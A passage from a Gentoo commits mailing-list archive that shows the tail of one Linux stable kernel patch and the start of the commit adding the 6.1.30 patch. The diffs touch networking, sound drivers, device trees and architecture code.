++		if (skb_orphan_frags_rx(skb, GFP_ATOMIC)) {
++			kfree_skb(skb);
+ 			return;
++		}
+ 	}
+ 	if (!skb)
+ 		return;
+@@ -6182,21 +6186,20 @@ static int pskb_carve_inside_header(struct sk_buff *skb, const u32 off,
+ 				    const int headlen, gfp_t gfp_mask)
+ {
+ 	int i;
+-	int size = skb_end_offset(skb);
++	unsigned int size = skb_end_offset(skb);
+ 	int new_hlen = headlen - off;
+ 	u8 *data;
+ 
+-	size = SKB_DATA_ALIGN(size);
+-
+ 	if (skb_pfmemalloc(skb))
+ 		gfp_mask |= __GFP_MEMALLOC;
+-	data = kmalloc_reserve(size +
+-			       SKB_DATA_ALIGN(sizeof(struct skb_shared_info)),
+-			       gfp_mask, NUMA_NO_NODE, NULL);
++
++	size = SKB_DATA_ALIGN(size);
++	size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
++	size = kmalloc_size_roundup(size);
++	data = kmalloc_reserve(size, gfp_mask, NUMA_NO_NODE, NULL);
+ 	if (!data)
+ 		return -ENOMEM;
+-
+-	size = SKB_WITH_OVERHEAD(ksize(data));
++	size = SKB_WITH_OVERHEAD(size);
+ 
+ 	/* Copy real data, and all frags */
+ 	skb_copy_from_linear_data_offset(skb, off, data, new_hlen);
+@@ -6301,22 +6304,21 @@ static int pskb_carve_inside_nonlinear(struct sk_buff *skb, const u32 off,
+ 				       int pos, gfp_t gfp_mask)
+ {
+ 	int i, k = 0;
+-	int size = skb_end_offset(skb);
++	unsigned int size = skb_end_offset(skb);
+ 	u8 *data;
+ 	const int nfrags = skb_shinfo(skb)->nr_frags;
+ 	struct skb_shared_info *shinfo;
+ 
+-	size = SKB_DATA_ALIGN(size);
+-
+ 	if (skb_pfmemalloc(skb))
+ 		gfp_mask |= __GFP_MEMALLOC;
+-	data = kmalloc_reserve(size +
+-			       SKB_DATA_ALIGN(sizeof(struct skb_shared_info)),
+-			       gfp_mask, NUMA_NO_NODE, NULL);
++
++	size = SKB_DATA_ALIGN(size);
++	size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
++	size = kmalloc_size_roundup(size);
++	data = kmalloc_reserve(size, gfp_mask, NUMA_NO_NODE, NULL);
+ 	if (!data)
+ 		return -ENOMEM;
+-
+-	size = SKB_WITH_OVERHEAD(ksize(data));
++	size = SKB_WITH_OVERHEAD(size);
+ 
+ 	memcpy((struct skb_shared_info *)(data + size),
+ 	       skb_shinfo(skb), offsetof(struct skb_shared_info, frags[0]));
+diff --git a/net/ipv4/udplite.c b/net/ipv4/udplite.c
+index e0c9cc39b81e3..56d94d23b9e0f 100644
+--- a/net/ipv4/udplite.c
++++ b/net/ipv4/udplite.c
+@@ -64,6 +64,8 @@ struct proto 	udplite_prot = {
+ 	.per_cpu_fw_alloc  = &udp_memory_per_cpu_fw_alloc,
+ 
+ 	.sysctl_mem	   = sysctl_udp_mem,
++	.sysctl_wmem_offset = offsetof(struct net, ipv4.sysctl_udp_wmem_min),
++	.sysctl_rmem_offset = offsetof(struct net, ipv4.sysctl_udp_rmem_min),
+ 	.obj_size	   = sizeof(struct udp_sock),
+ 	.h.udp_table	   = &udplite_table,
+ };
+diff --git a/net/ipv6/exthdrs_core.c b/net/ipv6/exthdrs_core.c
+index da46c42846765..49e31e4ae7b7f 100644
+--- a/net/ipv6/exthdrs_core.c
++++ b/net/ipv6/exthdrs_core.c
+@@ -143,6 +143,8 @@ int ipv6_find_tlv(const struct sk_buff *skb, int offset, int type)
+ 			optlen = 1;
+ 			break;
+ 		default:
++			if (len < 2)
++				goto bad;
+ 			optlen = nh[offset + 1] + 2;
+ 			if (optlen > len)
+ 				goto bad;
+diff --git a/net/ipv6/udplite.c b/net/ipv6/udplite.c
+index 67eaf3ca14cea..3bab0cc136977 100644
+--- a/net/ipv6/udplite.c
++++ b/net/ipv6/udplite.c
+@@ -60,6 +60,8 @@ struct proto udplitev6_prot = {
+ 	.per_cpu_fw_alloc  = &udp_memory_per_cpu_fw_alloc,
+ 
+ 	.sysctl_mem	   = sysctl_udp_mem,
++	.sysctl_wmem_offset = offsetof(struct net, ipv4.sysctl_udp_wmem_min),
++	.sysctl_rmem_offset = offsetof(struct net, ipv4.sysctl_udp_rmem_min),
+ 	.obj_size	   = sizeof(struct udp6_sock),
+ 	.h.udp_table	   = &udplite_table,
+ };
+diff --git a/net/sctp/transport.c b/net/sctp/transport.c
+index b3f1a91e9a079..2990365c2f2c9 100644
+--- a/net/sctp/transport.c
++++ b/net/sctp/transport.c
+@@ -324,9 +324,12 @@ bool sctp_transport_pl_recv(struct sctp_transport *t)
+ 		t->pl.probe_size += SCTP_PL_BIG_STEP;
+ 	} else if (t->pl.state == SCTP_PL_SEARCH) {
+ 		if (!t->pl.probe_high) {
+-			t->pl.probe_size = min(t->pl.probe_size + SCTP_PL_BIG_STEP,
+-					       SCTP_MAX_PLPMTU);
+-			return false;
++			if (t->pl.probe_size < SCTP_MAX_PLPMTU) {
++				t->pl.probe_size = min(t->pl.probe_size + SCTP_PL_BIG_STEP,
++						       SCTP_MAX_PLPMTU);
++				return false;
++			}
++			t->pl.probe_high = SCTP_MAX_PLPMTU;
+ 		}
+ 		t->pl.probe_size += SCTP_PL_MIN_STEP;
+ 		if (t->pl.probe_size >= t->pl.probe_high) {
+@@ -341,7 +344,7 @@ bool sctp_transport_pl_recv(struct sctp_transport *t)
+ 	} else if (t->pl.state == SCTP_PL_COMPLETE) {
+ 		/* Raise probe_size again after 30 * interval in Search Complete */
+ 		t->pl.state = SCTP_PL_SEARCH; /* Search Complete -> Search */
+-		t->pl.probe_size += SCTP_PL_MIN_STEP;
++		t->pl.probe_size = min(t->pl.probe_size + SCTP_PL_MIN_STEP, SCTP_MAX_PLPMTU);
+ 	}
+ 
+ 	return t->pl.state == SCTP_PL_COMPLETE;
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index e8018b0fb7676..02d1daae77397 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -1987,8 +1987,10 @@ static int smc_listen_rdma_init(struct smc_sock *new_smc,
+ 		return rc;
+ 
+ 	/* create send buffer and rmb */
+-	if (smc_buf_create(new_smc, false))
++	if (smc_buf_create(new_smc, false)) {
++		smc_conn_abort(new_smc, ini->first_contact_local);
+ 		return SMC_CLC_DECL_MEM;
++	}
+ 
+ 	return 0;
+ }
+@@ -2204,8 +2206,11 @@ static void smc_find_rdma_v2_device_serv(struct smc_sock *new_smc,
+ 	smcr_version = ini->smcr_version;
+ 	ini->smcr_version = SMC_V2;
+ 	rc = smc_listen_rdma_init(new_smc, ini);
+-	if (!rc)
++	if (!rc) {
+ 		rc = smc_listen_rdma_reg(new_smc, ini->first_contact_local);
++		if (rc)
++			smc_conn_abort(new_smc, ini->first_contact_local);
++	}
+ 	if (!rc)
+ 		return;
+ 	ini->smcr_version = smcr_version;
+diff --git a/net/smc/smc_core.c b/net/smc/smc_core.c
+index 0208dfb353456..f82f43573a159 100644
+--- a/net/smc/smc_core.c
++++ b/net/smc/smc_core.c
+@@ -127,6 +127,7 @@ static int smcr_lgr_conn_assign_link(struct smc_connection *conn, bool first)
+ 	int i, j;
+ 
+ 	/* do link balancing */
++	conn->lnk = NULL;	/* reset conn->lnk first */
+ 	for (i = 0; i < SMC_LINKS_PER_LGR_MAX; i++) {
+ 		struct smc_link *lnk = &conn->lgr->lnk[i];
+ 
+diff --git a/net/sunrpc/sched.c b/net/sunrpc/sched.c
+index c8321de341eea..6debf4fd42d4e 100644
+--- a/net/sunrpc/sched.c
++++ b/net/sunrpc/sched.c
+@@ -927,11 +927,10 @@ static void __rpc_execute(struct rpc_task *task)
+ 		 */
+ 		do_action = task->tk_action;
+ 		/* Tasks with an RPC error status should exit */
+-		if (do_action != rpc_exit_task &&
++		if (do_action && do_action != rpc_exit_task &&
+ 		    (status = READ_ONCE(task->tk_rpc_status)) != 0) {
+ 			task->tk_status = status;
+-			if (do_action != NULL)
+-				do_action = rpc_exit_task;
++			do_action = rpc_exit_task;
+ 		}
+ 		/* Callbacks override all actions */
+ 		if (task->tk_callback) {
+diff --git a/sound/hda/hdac_device.c b/sound/hda/hdac_device.c
+index b7e5032b61c97..bfd8585776767 100644
+--- a/sound/hda/hdac_device.c
++++ b/sound/hda/hdac_device.c
+@@ -611,7 +611,7 @@ EXPORT_SYMBOL_GPL(snd_hdac_power_up_pm);
+ int snd_hdac_keep_power_up(struct hdac_device *codec)
+ {
+ 	if (!atomic_inc_not_zero(&codec->in_pm)) {
+-		int ret = pm_runtime_get_if_in_use(&codec->dev);
++		int ret = pm_runtime_get_if_active(&codec->dev, true);
+ 		if (!ret)
+ 			return -1;
+ 		if (ret < 0)
+diff --git a/sound/pci/hda/patch_ca0132.c b/sound/pci/hda/patch_ca0132.c
+index 099722ebaed83..748a3c40966e9 100644
+--- a/sound/pci/hda/patch_ca0132.c
++++ b/sound/pci/hda/patch_ca0132.c
+@@ -1306,6 +1306,7 @@ static const struct snd_pci_quirk ca0132_quirks[] = {
+ 	SND_PCI_QUIRK(0x1458, 0xA026, "Gigabyte G1.Sniper Z97", QUIRK_R3DI),
+ 	SND_PCI_QUIRK(0x1458, 0xA036, "Gigabyte GA-Z170X-Gaming 7", QUIRK_R3DI),
+ 	SND_PCI_QUIRK(0x3842, 0x1038, "EVGA X99 Classified", QUIRK_R3DI),
++	SND_PCI_QUIRK(0x3842, 0x104b, "EVGA X299 Dark", QUIRK_R3DI),
+ 	SND_PCI_QUIRK(0x3842, 0x1055, "EVGA Z390 DARK", QUIRK_R3DI),
+ 	SND_PCI_QUIRK(0x1102, 0x0013, "Recon3D", QUIRK_R3D),
+ 	SND_PCI_QUIRK(0x1102, 0x0018, "Recon3D", QUIRK_R3D),
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index c757607177368..379f216158ab4 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -11699,6 +11699,8 @@ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x32cb, "Lenovo ThinkCentre M70", ALC897_FIXUP_HEADSET_MIC_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x32cf, "Lenovo ThinkCentre M950", ALC897_FIXUP_HEADSET_MIC_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x32f7, "Lenovo ThinkCentre M90", ALC897_FIXUP_HEADSET_MIC_PIN),
++	SND_PCI_QUIRK(0x17aa, 0x3321, "Lenovo ThinkCentre M70 Gen4", ALC897_FIXUP_HEADSET_MIC_PIN),
++	SND_PCI_QUIRK(0x17aa, 0x331b, "Lenovo ThinkCentre M90 Gen4", ALC897_FIXUP_HEADSET_MIC_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x3742, "Lenovo TianYi510Pro-14IOB", ALC897_FIXUP_HEADSET_MIC_PIN2),
+ 	SND_PCI_QUIRK(0x17aa, 0x38af, "Lenovo Ideapad Y550P", ALC662_FIXUP_IDEAPAD),
+ 	SND_PCI_QUIRK(0x17aa, 0x3a0d, "Lenovo Ideapad Y550", ALC662_FIXUP_IDEAPAD),
+diff --git a/sound/soc/codecs/lpass-tx-macro.c b/sound/soc/codecs/lpass-tx-macro.c
+index d1d9d8d2df2d2..9f59518005a5f 100644
+--- a/sound/soc/codecs/lpass-tx-macro.c
++++ b/sound/soc/codecs/lpass-tx-macro.c
+@@ -745,6 +745,8 @@ static int tx_macro_put_dec_enum(struct snd_kcontrol *kcontrol,
+ 	struct tx_macro *tx = snd_soc_component_get_drvdata(component);
+ 
+ 	val = ucontrol->value.enumerated.item[0];
++	if (val >= e->items)
++		return -EINVAL;
+ 
+ 	switch (e->reg) {
+ 	case CDC_TX_INP_MUX_ADC_MUX0_CFG0:
+@@ -771,6 +773,9 @@ static int tx_macro_put_dec_enum(struct snd_kcontrol *kcontrol,
+ 	case CDC_TX_INP_MUX_ADC_MUX7_CFG0:
+ 		mic_sel_reg = CDC_TX7_TX_PATH_CFG0;
+ 		break;
++	default:
++		dev_err(component->dev, "Error in configuration!!\n");
++		return -EINVAL;
+ 	}
+ 
+ 	if (val != 0) {
+diff --git a/sound/soc/codecs/rt5682-i2c.c b/sound/soc/codecs/rt5682-i2c.c
+index 2935c1bb81f3f..5bc46b0417866 100644
+--- a/sound/soc/codecs/rt5682-i2c.c
++++ b/sound/soc/codecs/rt5682-i2c.c
+@@ -267,7 +267,9 @@ static int rt5682_i2c_probe(struct i2c_client *i2c)
+ 		ret = devm_request_threaded_irq(&i2c->dev, i2c->irq, NULL,
+ 			rt5682_irq, IRQF_TRIGGER_RISING | IRQF_TRIGGER_FALLING
+ 			| IRQF_ONESHOT, "rt5682", rt5682);
+-		if (ret)
++		if (!ret)
++			rt5682->irq = i2c->irq;
++		else
+ 			dev_err(&i2c->dev, "Failed to reguest IRQ: %d\n", ret);
+ 	}
+ 
+diff --git a/sound/soc/codecs/rt5682.c b/sound/soc/codecs/rt5682.c
+index 2df95e792900c..a6636ef69f57d 100644
+--- a/sound/soc/codecs/rt5682.c
++++ b/sound/soc/codecs/rt5682.c
+@@ -2957,6 +2957,9 @@ static int rt5682_suspend(struct snd_soc_component *component)
+ 	if (rt5682->is_sdw)
+ 		return 0;
+ 
++	if (rt5682->irq)
++		disable_irq(rt5682->irq);
++
+ 	cancel_delayed_work_sync(&rt5682->jack_detect_work);
+ 	cancel_delayed_work_sync(&rt5682->jd_check_work);
+ 	if (rt5682->hs_jack && (rt5682->jack_type & SND_JACK_HEADSET) == SND_JACK_HEADSET) {
+@@ -3025,6 +3028,9 @@ static int rt5682_resume(struct snd_soc_component *component)
+ 	mod_delayed_work(system_power_efficient_wq,
+ 		&rt5682->jack_detect_work, msecs_to_jiffies(0));
+ 
++	if (rt5682->irq)
++		enable_irq(rt5682->irq);
++
+ 	return 0;
+ }
+ #else
+diff --git a/sound/soc/codecs/rt5682.h b/sound/soc/codecs/rt5682.h
+index 52ff0d9c36c58..5fd798eac40df 100644
+--- a/sound/soc/codecs/rt5682.h
++++ b/sound/soc/codecs/rt5682.h
+@@ -1462,6 +1462,7 @@ struct rt5682_priv {
+ 	int pll_out[RT5682_PLLS];
+ 
+ 	int jack_type;
++	int irq;
+ 	int irq_work_delay_time;
+ };
+ 
+diff --git a/sound/soc/intel/avs/apl.c b/sound/soc/intel/avs/apl.c
+index b8e2b23c9f642..f366478a875de 100644
+--- a/sound/soc/intel/avs/apl.c
++++ b/sound/soc/intel/avs/apl.c
+@@ -173,6 +173,7 @@ static bool apl_lp_streaming(struct avs_dev *adev)
+ {
+ 	struct avs_path *path;
+ 
++	spin_lock(&adev->path_list_lock);
+ 	/* Any gateway without buffer allocated in LP area disqualifies D0IX. */
+ 	list_for_each_entry(path, &adev->path_list, node) {
+ 		struct avs_path_pipeline *ppl;
+@@ -192,11 +193,14 @@ static bool apl_lp_streaming(struct avs_dev *adev)
+ 				if (cfg->copier.dma_type == INVALID_OBJECT_ID)
+ 					continue;
+ 
+-				if (!mod->gtw_attrs.lp_buffer_alloc)
++				if (!mod->gtw_attrs.lp_buffer_alloc) {
++					spin_unlock(&adev->path_list_lock);
+ 					return false;
++				}
+ 			}
+ 		}
+ 	}
++	spin_unlock(&adev->path_list_lock);
+ 
+ 	return true;
+ }
+diff --git a/sound/soc/intel/avs/messages.h b/sound/soc/intel/avs/messages.h
+index c0f90dba9af89..b82b2483ef9b3 100644
+--- a/sound/soc/intel/avs/messages.h
++++ b/sound/soc/intel/avs/messages.h
+@@ -611,7 +611,7 @@ enum avs_channel_config {
+ 	AVS_CHANNEL_CONFIG_DUAL_MONO = 9,
+ 	AVS_CHANNEL_CONFIG_I2S_DUAL_STEREO_0 = 10,
+ 	AVS_CHANNEL_CONFIG_I2S_DUAL_STEREO_1 = 11,
+-	AVS_CHANNEL_CONFIG_4_CHANNEL = 12,
++	AVS_CHANNEL_CONFIG_7_1 = 12,
+ 	AVS_CHANNEL_CONFIG_INVALID
+ };
+ 
+diff --git a/tools/testing/selftests/memfd/fuse_test.c b/tools/testing/selftests/memfd/fuse_test.c
+index be675002f918a..93798c8c5d54b 100644
+--- a/tools/testing/selftests/memfd/fuse_test.c
++++ b/tools/testing/selftests/memfd/fuse_test.c
+@@ -22,6 +22,7 @@
+ #include <linux/falloc.h>
+ #include <fcntl.h>
+ #include <linux/memfd.h>
++#include <linux/types.h>
+ #include <sched.h>
+ #include <stdio.h>
+ #include <stdlib.h>
+diff --git a/tools/testing/selftests/net/fib_tests.sh b/tools/testing/selftests/net/fib_tests.sh
+index 70ea8798b1f60..e5db2a2a67df9 100755
+--- a/tools/testing/selftests/net/fib_tests.sh
++++ b/tools/testing/selftests/net/fib_tests.sh
+@@ -68,7 +68,7 @@ setup()
+ cleanup()
+ {
+ 	$IP link del dev dummy0 &> /dev/null
+-	ip netns del ns1
++	ip netns del ns1 &> /dev/null
+ 	ip netns del ns2 &> /dev/null
+ }
+ 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-05-24 17:05 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-05-24 17:05 UTC (permalink / raw
  To: gentoo-commits

commit:     6bb774fdcc66711b827740662669a6ad8381d739
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed May 24 17:05:27 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed May 24 17:05:27 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=6bb774fd

Linux patch 6.1.29

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1029_linux-6.1.30.patch | 18622 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 18626 insertions(+)

diff --git a/0000_README b/0000_README
index 9c3afe15..5f7fb2f0 100644
--- a/0000_README
+++ b/0000_README
@@ -159,6 +159,10 @@ Patch:  1028_linux-6.1.29.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.29
 
+Patch:  1029_linux-6.1.30.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.30
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1029_linux-6.1.30.patch b/1029_linux-6.1.30.patch
new file mode 100644
index 00000000..9de71c25
--- /dev/null
+++ b/1029_linux-6.1.30.patch
@@ -0,0 +1,18622 @@
+diff --git a/Documentation/arm64/silicon-errata.rst b/Documentation/arm64/silicon-errata.rst
+index 808ade4cc008a..55492fea44276 100644
+--- a/Documentation/arm64/silicon-errata.rst
++++ b/Documentation/arm64/silicon-errata.rst
+@@ -170,6 +170,8 @@ stable kernels.
+ +----------------+-----------------+-----------------+-----------------------------+
+ | NVIDIA         | Carmel Core     | N/A             | NVIDIA_CARMEL_CNP_ERRATUM   |
+ +----------------+-----------------+-----------------+-----------------------------+
++| NVIDIA         | T241 GICv3/4.x  | T241-FABRIC-4   | N/A                         |
+++----------------+-----------------+-----------------+-----------------------------+
+ +----------------+-----------------+-----------------+-----------------------------+
+ | Freescale/NXP  | LS2080A/LS1043A | A-008585        | FSL_ERRATUM_A008585         |
+ +----------------+-----------------+-----------------+-----------------------------+
+diff --git a/Documentation/devicetree/bindings/ata/ceva,ahci-1v84.yaml b/Documentation/devicetree/bindings/ata/ceva,ahci-1v84.yaml
+index 9b31f864e071e..71364c6081ff5 100644
+--- a/Documentation/devicetree/bindings/ata/ceva,ahci-1v84.yaml
++++ b/Documentation/devicetree/bindings/ata/ceva,ahci-1v84.yaml
+@@ -32,7 +32,7 @@ properties:
+     maxItems: 1
+ 
+   iommus:
+-    maxItems: 1
++    maxItems: 4
+ 
+   power-domains:
+     maxItems: 1
+diff --git a/Documentation/devicetree/bindings/display/msm/dsi-controller-main.yaml b/Documentation/devicetree/bindings/display/msm/dsi-controller-main.yaml
+index 6c5b4783812ae..2fa1759e74d95 100644
+--- a/Documentation/devicetree/bindings/display/msm/dsi-controller-main.yaml
++++ b/Documentation/devicetree/bindings/display/msm/dsi-controller-main.yaml
+@@ -65,6 +65,18 @@ properties:
+       Indicates if the DSI controller is driving a panel which needs
+       2 DSI links.
+ 
++  qcom,master-dsi:
++    type: boolean
++    description: |
++      Indicates if the DSI controller is the master DSI controller when
++      qcom,dual-dsi-mode enabled.
++
++  qcom,sync-dual-dsi:
++    type: boolean
++    description: |
++      Indicates if the DSI controller needs to sync the other DSI controller
++      with MIPI DCS commands when qcom,dual-dsi-mode enabled.
++
+   assigned-clocks:
+     maxItems: 2
+     description: |
+diff --git a/MAINTAINERS b/MAINTAINERS
+index 350d7e3ba94f9..301b9ba6af79f 100644
+--- a/MAINTAINERS
++++ b/MAINTAINERS
+@@ -9362,7 +9362,7 @@ F:	drivers/net/wireless/intersil/hostap/
+ HP COMPAQ TC1100 TABLET WMI EXTRAS DRIVER
+ L:	platform-driver-x86@vger.kernel.org
+ S:	Orphan
+-F:	drivers/platform/x86/tc1100-wmi.c
++F:	drivers/platform/x86/hp/tc1100-wmi.c
+ 
+ HPET:	High Precision Event Timers driver
+ M:	Clemens Ladisch <clemens@ladisch.de>
+@@ -11858,7 +11858,7 @@ M:	Eric Piel <eric.piel@tremplin-utc.net>
+ S:	Maintained
+ F:	Documentation/misc-devices/lis3lv02d.rst
+ F:	drivers/misc/lis3lv02d/
+-F:	drivers/platform/x86/hp_accel.c
++F:	drivers/platform/x86/hp/hp_accel.c
+ 
+ LIST KUNIT TEST
+ M:	David Gow <davidgow@google.com>
+diff --git a/Makefile b/Makefile
+index f02f6e1ac5743..aeb58c7a4baa4 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 29
++SUBLEVEL = 30
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/mach-sa1100/jornada720_ssp.c b/arch/arm/mach-sa1100/jornada720_ssp.c
+index 1dbe98948ce30..9627c4cf3e41d 100644
+--- a/arch/arm/mach-sa1100/jornada720_ssp.c
++++ b/arch/arm/mach-sa1100/jornada720_ssp.c
+@@ -1,5 +1,5 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+-/**
++/*
+  *  arch/arm/mac-sa1100/jornada720_ssp.c
+  *
+  *  Copyright (C) 2006/2007 Kristoffer Ericson <Kristoffer.Ericson@gmail.com>
+@@ -26,6 +26,7 @@ static unsigned long jornada_ssp_flags;
+ 
+ /**
+  * jornada_ssp_reverse - reverses input byte
++ * @byte: input byte to reverse
+  *
+  * we need to reverse all data we receive from the mcu due to its physical location
+  * returns : 01110111 -> 11101110
+@@ -46,6 +47,7 @@ EXPORT_SYMBOL(jornada_ssp_reverse);
+ 
+ /**
+  * jornada_ssp_byte - waits for ready ssp bus and sends byte
++ * @byte: input byte to transmit
+  *
+  * waits for fifo buffer to clear and then transmits, if it doesn't then we will
+  * timeout after <timeout> rounds. Needs mcu running before its called.
+@@ -77,6 +79,7 @@ EXPORT_SYMBOL(jornada_ssp_byte);
+ 
+ /**
+  * jornada_ssp_inout - decide if input is command or trading byte
++ * @byte: input byte to send (may be %TXDUMMY)
+  *
+  * returns : (jornada_ssp_byte(byte)) on success
+  *         : %-ETIMEDOUT on timeout failure
+diff --git a/arch/arm64/boot/dts/freescale/imx8mq-librem5.dtsi b/arch/arm64/boot/dts/freescale/imx8mq-librem5.dtsi
+index ae08556b2ef2f..1499d5d8bbc04 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mq-librem5.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mq-librem5.dtsi
+@@ -1299,7 +1299,6 @@
+ 	#address-cells = <1>;
+ 	#size-cells = <0>;
+ 	dr_mode = "otg";
+-	snps,dis_u3_susphy_quirk;
+ 	usb-role-switch;
+ 	status = "okay";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8996.dtsi b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+index 67b87915d8224..9f89100542018 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+@@ -2979,8 +2979,11 @@
+ 				interrupts = <0 131 IRQ_TYPE_LEVEL_HIGH>;
+ 				phys = <&hsusb_phy1>, <&ssusb_phy_0>;
+ 				phy-names = "usb2-phy", "usb3-phy";
++				snps,hird-threshold = /bits/ 8 <0>;
+ 				snps,dis_u2_susphy_quirk;
+ 				snps,dis_enblslpm_quirk;
++				snps,is-utmi-l1-suspend;
++				tx-fifo-resize;
+ 			};
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
+index f982594896796..74c6832e05985 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
+@@ -731,8 +731,6 @@
+ 	vdd-1.3-rfa-supply = <&vreg_l17a_1p3>;
+ 	vdd-3.3-ch0-supply = <&vreg_l25a_3p3>;
+ 	vdd-3.3-ch1-supply = <&vreg_l23a_3p3>;
+-
+-	qcom,snoc-host-cap-skip-quirk;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/kernel/mte.c b/arch/arm64/kernel/mte.c
+index 84a085d536f84..e20af03b4cdfa 100644
+--- a/arch/arm64/kernel/mte.c
++++ b/arch/arm64/kernel/mte.c
+@@ -72,13 +72,10 @@ void mte_sync_tags(pte_t old_pte, pte_t pte)
+ 		return;
+ 
+ 	/* if PG_mte_tagged is set, tags have already been initialised */
+-	for (i = 0; i < nr_pages; i++, page++) {
+-		if (!page_mte_tagged(page)) {
++	for (i = 0; i < nr_pages; i++, page++)
++		if (!page_mte_tagged(page))
+ 			mte_sync_page_tags(page, old_pte, check_swap,
+ 					   pte_is_tagged);
+-			set_page_mte_tagged(page);
+-		}
+-	}
+ 
+ 	/* ensure the tags are visible before the PTE is set */
+ 	smp_wmb();
+diff --git a/arch/parisc/include/asm/pdc.h b/arch/parisc/include/asm/pdc.h
+index fcbcf9a96c111..77622558bf651 100644
+--- a/arch/parisc/include/asm/pdc.h
++++ b/arch/parisc/include/asm/pdc.h
+@@ -80,6 +80,7 @@ int pdc_do_firm_test_reset(unsigned long ftc_bitmap);
+ int pdc_do_reset(void);
+ int pdc_soft_power_info(unsigned long *power_reg);
+ int pdc_soft_power_button(int sw_control);
++int pdc_soft_power_button_panic(int sw_control);
+ void pdc_io_reset(void);
+ void pdc_io_reset_devices(void);
+ int pdc_iodc_getc(void);
+diff --git a/arch/parisc/kernel/firmware.c b/arch/parisc/kernel/firmware.c
+index bd325f2b5349e..3e051a973e9b2 100644
+--- a/arch/parisc/kernel/firmware.c
++++ b/arch/parisc/kernel/firmware.c
+@@ -1232,15 +1232,18 @@ int __init pdc_soft_power_info(unsigned long *power_reg)
+ }
+ 
+ /*
+- * pdc_soft_power_button - Control the soft power button behaviour
+- * @sw_control: 0 for hardware control, 1 for software control 
++ * pdc_soft_power_button{_panic} - Control the soft power button behaviour
++ * @sw_control: 0 for hardware control, 1 for software control
+  *
+  *
+  * This PDC function places the soft power button under software or
+  * hardware control.
+- * Under software control the OS may control to when to allow to shut 
+- * down the system. Under hardware control pressing the power button 
++ * Under software control the OS may control to when to allow to shut
++ * down the system. Under hardware control pressing the power button
+  * powers off the system immediately.
++ *
++ * The _panic version relies on spin_trylock to prevent deadlock
++ * on panic path.
+  */
+ int pdc_soft_power_button(int sw_control)
+ {
+@@ -1254,6 +1257,22 @@ int pdc_soft_power_button(int sw_control)
+ 	return retval;
+ }
+ 
++int pdc_soft_power_button_panic(int sw_control)
++{
++	int retval;
++	unsigned long flags;
++
++	if (!spin_trylock_irqsave(&pdc_lock, flags)) {
++		pr_emerg("Couldn't enable soft power button\n");
++		return -EBUSY; /* ignored by the panic notifier */
++	}
++
++	retval = mem_pdc_call(PDC_SOFT_POWER, PDC_SOFT_POWER_ENABLE, __pa(pdc_result), sw_control);
++	spin_unlock_irqrestore(&pdc_lock, flags);
++
++	return retval;
++}
++
+ /*
+  * pdc_io_reset - Hack to avoid overlapping range registers of Bridges devices.
+  * Primarily a problem on T600 (which parisc-linux doesn't support) but
+diff --git a/arch/powerpc/kernel/dma-iommu.c b/arch/powerpc/kernel/dma-iommu.c
+index 038ce8d9061d1..8920862ffd791 100644
+--- a/arch/powerpc/kernel/dma-iommu.c
++++ b/arch/powerpc/kernel/dma-iommu.c
+@@ -144,7 +144,7 @@ static bool dma_iommu_bypass_supported(struct device *dev, u64 mask)
+ /* We support DMA to/from any memory page via the iommu */
+ int dma_iommu_dma_supported(struct device *dev, u64 mask)
+ {
+-	struct iommu_table *tbl = get_iommu_table_base(dev);
++	struct iommu_table *tbl;
+ 
+ 	if (dev_is_pci(dev) && dma_iommu_bypass_supported(dev, mask)) {
+ 		/*
+@@ -162,6 +162,8 @@ int dma_iommu_dma_supported(struct device *dev, u64 mask)
+ 		return 1;
+ 	}
+ 
++	tbl = get_iommu_table_base(dev);
++
+ 	if (!tbl) {
+ 		dev_err(dev, "Warning: IOMMU dma not supported: mask 0x%08llx, table unavailable\n", mask);
+ 		return 0;
+diff --git a/arch/powerpc/kernel/iommu.c b/arch/powerpc/kernel/iommu.c
+index ee95937bdaf14..b8b7a189cd3ce 100644
+--- a/arch/powerpc/kernel/iommu.c
++++ b/arch/powerpc/kernel/iommu.c
